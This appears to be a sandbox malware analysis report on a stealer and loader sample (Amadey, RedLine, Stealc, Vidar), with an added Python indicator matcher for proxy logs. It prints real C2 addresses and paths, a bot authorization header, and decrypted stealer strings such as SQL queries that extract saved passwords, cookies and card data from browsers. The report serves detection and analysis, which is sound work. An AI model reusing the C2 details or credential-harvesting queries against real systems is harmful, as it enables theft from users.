Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1483138
MD5: 8e3c2682f9743107cb2b3a3d15b072f5
SHA1: 660a9b6ad3f5cd1bd37e04015b25a893de4c5f90
SHA256: 6322686d71a40e20eca9b41af872049e06aab4439a2d06e607e9620decfec41d
Tags: exe

Detection

Amadey, Babadeda, RedLine, Stealc, Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Yara detected Amadeys stealer DLL
Yara detected Babadeda
Yara detected Powershell download and execute
Yara detected RedLine Stealer
Yara detected Stealc
Yara detected Vidar
Yara detected Vidar stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Creates multiple autostart registry keys
Drops PE files with a suspicious file extension
Found evasive API chain (may stop execution after checking locale)
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Installs new ROOT certificates
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Searches for specific processes (likely to inject)
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Suspicious File Creation In Uncommon AppData Folder
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Tries to steal Mail credentials (via file / registry access)
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected TCP or UDP traffic on non-standard ports
Detected non-DNS traffic on DNS port
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops certificate files (DER)
Enables debug privileges
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE file contains an invalid checksum
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the installation date of Windows
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for user specific document files
Sigma detected: CurrentVersion Autorun Keys Modification
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Name: Amadey
Description: Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.
Attribution: No Attribution
Blogpost URLs: (none)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Name: Babadeda
Description: According to PCrisk, Babadeda is a new sample in the crypters family, allowing threat actors to encrypt and obfuscate the malicious samples. The obfuscation allows malware to bypass the majority of antivirus protections without triggering any alerts. According to the researchers' analysis, Babadeda leverages a sophisticated and complex obfuscation that shows a very low detection rate by anti-virus engines.
Attribution: No Attribution
Blogpost URLs: (none)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.babadeda

Name: RedLine Stealer
Description: RedLine Stealer is a malware available on underground forums for sale, apparently as a standalone ($100/$150 depending on the version) or on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, including details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.
Attribution: No Attribution
Blogpost URLs: (none)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development relies on other prominent stealers: Vidar, Raccoon, Mars and RedLine. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, browser extensions and desktop cryptocurrency wallet applications, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers: sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Blogpost URLs: (none)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Name: Vidar
Description: Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that grabs information on 2FA software and the Tor Browser.
Attribution: No Attribution
Blogpost URLs: (none)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar
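The Stealc description above (DLL staging followed by HTTP POST exfiltration) and the C2 endpoints recovered by the configuration extractors in the AV Detection section below give a small but concrete indicator set. The following Python is an added example, not part of the Joe Sandbox report and not the malware's own code: it turns those indicators into a matcher and runs it over a few constructed proxy log lines (the log format, timestamps and internal source addresses are assumptions; the hosts, ports, paths and DLL names are the ones reported on this page).

```python
import re
from urllib.parse import urlsplit

# Network indicators from the malware configurations extracted in this report.
# Hosts are normalised to "host:port" so a bare URL and an explicit port compare equal.
C2_ENDPOINTS = {
    "185.215.113.19:80",   # Amadey C2, path /Vi9leo/index.php
    "85.28.47.31:80",      # Vidar / Stealc C2 and the DLL staging host
    "185.215.113.9:9137",  # RedLine C2 on a non-standard port
}
# URL path prefixes recovered from the decrypted strings and the Avira URL Cloud hits.
C2_PATH_PREFIXES = ("/Vi9leo/index.php", "/5499d72b3a3e55be.php", "/8405906461a5200c/")
# The seven legitimate DLLs Stealc/Vidar pull from the staging directory.
STAGED_DLLS = {"sqlite3.dll", "nss3.dll", "vcruntime140.dll", "mozglue.dll",
               "freebl3.dll", "softokn3.dll", "msvcp140.dll"}

# Assumed log shape (constructed for this example): "<ts> <src-ip> <METHOD> <url> <status>"
LOG_RE = re.compile(r"^(?P<ts>\S+) (?P<src>\S+) (?P<method>[A-Z]+) (?P<url>\S+) (?P<status>\d{3})$")

def split_url(url):
    """Return ("host:port", path) with the default port filled in from the scheme."""
    parts = urlsplit(url)
    port = parts.port or (443 if parts.scheme == "https" else 80)
    return f"{parts.hostname}:{port}", parts.path

def classify(line):
    """Return the list of reasons a single proxy log line matches the report's IOCs."""
    m = LOG_RE.match(line)
    if not m:
        return []
    hostport, path = split_url(m["url"])
    reasons = []
    if hostport in C2_ENDPOINTS:
        reasons.append(f"c2-host:{hostport}")
    if path.startswith(C2_PATH_PREFIXES):
        reasons.append(f"c2-path:{path}")
    # A known staging DLL fetched from the staging directory is the Stealc/Vidar
    # "download helper DLLs" step; flag it separately so it can be triaged first.
    filename = path.rsplit("/", 1)[-1].lower()
    if filename in STAGED_DLLS and path.startswith("/8405906461a5200c/"):
        reasons.append(f"stealc-dll-stage:{filename}")
    return reasons

def scan(log_text):
    """Return [(timestamp, source, reasons)] for every line that matched at least one IOC."""
    hits = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        reasons = classify(line)
        if reasons:
            m = LOG_RE.match(line)
            hits.append((m["ts"], m["src"], reasons))
    return hits

# Constructed sample traffic: one host walking the Stealc chain, one Amadey check-in,
# one RedLine connection, and one benign request that must not match.
SAMPLE_LOG = """\
2024-07-23T10:01:02Z 10.0.0.5 GET http://85.28.47.31/8405906461a5200c/nss3.dll 200
2024-07-23T10:01:03Z 10.0.0.5 POST http://85.28.47.31/5499d72b3a3e55be.php 200
2024-07-23T10:01:09Z 10.0.0.5 POST http://185.215.113.19/Vi9leo/index.php 200
2024-07-23T10:01:15Z 10.0.0.5 GET http://185.215.113.9:9137/ 200
2024-07-23T10:02:00Z 10.0.0.7 GET https://www.example.com/index.html 200
"""

if __name__ == "__main__":
    for ts, src, reasons in scan(SAMPLE_LOG):
        print(ts, src, ", ".join(reasons))
```

Host and port indicators of this kind age quickly; the DLL staging pattern (the seven DLL names written to C:\ProgramData, which the report also flags under "Drops PE files to the application program directory") is the more durable signal and is the one to alert on alongside the addresses.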

AV Detection

Source: http://185.215.113.19/Vi9leo/index.php Avira URL Cloud: Label: malware
Source: http://85.28.47.31/8405906461a5200c/softokn3.dll Avira URL Cloud: Label: malware
Source: http://85.28.47.31/8405906461a5200c/vcruntime140.dll Avira URL Cloud: Label: malware
Source: http://85.28.47.31/8405906461a5200c/vcruntime140.dll; Avira URL Cloud: Label: malware
Source: http://85.28.47.31/8405906461a5200c/nss3.dll Avira URL Cloud: Label: malware
Source: http://85.28.47.31/8405906461a5200c/sqlite3.dlleZ2B Avira URL Cloud: Label: malware
Source: http://85.28.47.31/8405906461a5200c/softokn3.dllk Avira URL Cloud: Label: malware
Source: http://85.28.47.31/5499d72b3a3e55be.phposition: Avira URL Cloud: Label: malware
Source: 26.0.buildred.exe.800000.0.unpack Malware Configuration Extractor: RedLine {"C2 url": ["185.215.113.9:9137"], "Bot Id": "Logs", "Authorization Header": "f3f88d8c3034a76ac8ad2a0de6407050"}
Source: 0.2.file.exe.2600e67.1.raw.unpack Malware Configuration Extractor: Vidar {"C2 url": "http://85.28.47.31silence"}
Source: explorti.exe.3652.19.memstrmin Malware Configuration Extractor: Amadey {"C2 url": ["http://185.215.113.19/Vi9leo/index.php"]}
Source: ba77748b9b.exe.3144.22.memstrmin Malware Configuration Extractor: StealC {"C2 url": "http://85.28.47.31/5499d72b3a3e55be.php"}
Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\1000003002\ead6a72944.exe Joe Sandbox ML: detected
Source: file.exe Joe Sandbox ML: detected
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: INSERT_KEY_HERE
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: 22
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: 08
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: 20
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: 24
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: GetProcAddress
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: LoadLibraryA
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: lstrcatA
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: OpenEventA
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: CreateEventA
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: CloseHandle
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: Sleep
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: GetUserDefaultLangID
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: VirtualAllocExNuma
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: VirtualFree
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: GetSystemInfo
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: VirtualAlloc
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: HeapAlloc
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: GetComputerNameA
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: lstrcpyA
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: GetProcessHeap
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: GetCurrentProcess
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: lstrlenA
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: ExitProcess
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: GlobalMemoryStatusEx
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: GetSystemTime
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: SystemTimeToFileTime
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: advapi32.dll
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: gdi32.dll
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: user32.dll
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: crypt32.dll
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: ntdll.dll
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: GetUserNameA
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: CreateDCA
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: GetDeviceCaps
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: ReleaseDC
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: CryptStringToBinaryA
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: sscanf
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: VMwareVMware
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: HAL9TH
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: JohnDoe
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: DISPLAY
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: %hu/%hu/%hu
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: http://85.28.47.31
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: silence
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: /5499d72b3a3e55be.php
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: /8405906461a5200c/
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: sila
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: GetEnvironmentVariableA
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: GetFileAttributesA
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: GlobalLock
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: HeapFree
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: GetFileSize
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: GlobalSize
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: CreateToolhelp32Snapshot
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: IsWow64Process
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: Process32Next
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: GetLocalTime
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: FreeLibrary
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: GetTimeZoneInformation
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: GetSystemPowerStatus
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: GetVolumeInformationA
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: GetWindowsDirectoryA
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: Process32First
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: GetLocaleInfoA
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: GetUserDefaultLocaleName
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: GetModuleFileNameA
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: DeleteFileA
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: FindNextFileA
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: LocalFree
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: FindClose
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: SetEnvironmentVariableA
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: LocalAlloc
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: GetFileSizeEx
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: ReadFile
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: SetFilePointer
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: WriteFile
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: CreateFileA
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: FindFirstFileA
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: CopyFileA
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: VirtualProtect
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: GetLogicalProcessorInformationEx
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: GetLastError
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: lstrcpynA
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: MultiByteToWideChar
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: GlobalFree
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: WideCharToMultiByte
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: GlobalAlloc
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: OpenProcess
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: TerminateProcess
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: GetCurrentProcessId
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: gdiplus.dll
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: ole32.dll
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: bcrypt.dll
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: wininet.dll
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: shlwapi.dll
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: shell32.dll
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: psapi.dll
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: rstrtmgr.dll
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: CreateCompatibleBitmap
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: SelectObject
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: BitBlt
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: DeleteObject
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: CreateCompatibleDC
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: GdipGetImageEncodersSize
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: GdipGetImageEncoders
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: GdipCreateBitmapFromHBITMAP
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: GdiplusStartup
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: GdiplusShutdown
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: GdipSaveImageToStream
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: GdipDisposeImage
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: GdipFree
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: GetHGlobalFromStream
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: CreateStreamOnHGlobal
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: CoUninitialize
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: CoInitialize
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: CoCreateInstance
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: BCryptGenerateSymmetricKey
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: BCryptCloseAlgorithmProvider
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: BCryptDecrypt
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: BCryptSetProperty
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: BCryptDestroyKey
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: BCryptOpenAlgorithmProvider
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: GetWindowRect
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: GetDesktopWindow
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: GetDC
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: CloseWindow
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: wsprintfA
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: EnumDisplayDevicesA
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: GetKeyboardLayoutList
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: CharToOemW
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: wsprintfW
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: RegQueryValueExA
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: RegEnumKeyExA
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: RegOpenKeyExA
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: RegCloseKey
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: RegEnumValueA
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: CryptBinaryToStringA
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: CryptUnprotectData
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: SHGetFolderPathA
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: ShellExecuteExA
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: InternetOpenUrlA
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: InternetConnectA
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: InternetCloseHandle
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: InternetOpenA
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: HttpSendRequestA
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: HttpOpenRequestA
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: InternetReadFile
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: InternetCrackUrlA
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: StrCmpCA
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: StrStrA
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: StrCmpCW
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: PathMatchSpecA
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: GetModuleFileNameExA
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: RmStartSession
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: RmRegisterResources
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: RmGetList
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: RmEndSession
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: sqlite3_open
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: sqlite3_prepare_v2
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: sqlite3_step
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: sqlite3_column_text
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: sqlite3_finalize
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: sqlite3_close
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: sqlite3_column_bytes
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: sqlite3_column_blob
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: encrypted_key
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: PATH
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: C:\ProgramData\nss3.dll
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: NSS_Init
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: NSS_Shutdown
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: PK11_GetInternalKeySlot
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: PK11_FreeSlot
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: PK11_Authenticate
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: PK11SDR_Decrypt
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: C:\ProgramData\
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: SELECT origin_url, username_value, password_value FROM logins
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: browser:
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: profile:
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: url:
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: login:
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: password:
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: Opera
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: OperaGX
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: Network
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: cookies
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: .txt
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: SELECT HOST_KEY, is_httponly, path, is_secure, (expires_utc/1000000)-11644480800, name, encrypted_value from cookies
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: TRUE
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: FALSE
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: autofill
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: SELECT name, value FROM autofill
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: history
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: SELECT url FROM urls LIMIT 1000
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: cc
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cards
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: name:
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: month:
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: year:
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: card:
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: Cookies
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: Login Data
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: Web Data
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: History
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: logins.json
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: formSubmitURL
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: usernameField
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: encryptedUsername
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: encryptedPassword
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: guid
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: SELECT host, isHttpOnly, path, isSecure, expiry, name, value FROM moz_cookies
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: SELECT fieldname, value FROM moz_formhistory
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: SELECT url FROM moz_places LIMIT 1000
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: cookies.sqlite
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: formhistory.sqlite
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: places.sqlite
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: plugins
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: Local Extension Settings
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: Sync Extension Settings
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: IndexedDB
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: Opera Stable
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: Opera GX Stable
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: CURRENT
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: chrome-extension_
Source: 0.2.file.exe.2600e67.1.raw.unpack String decryptor: _0.indexeddb.leveldb
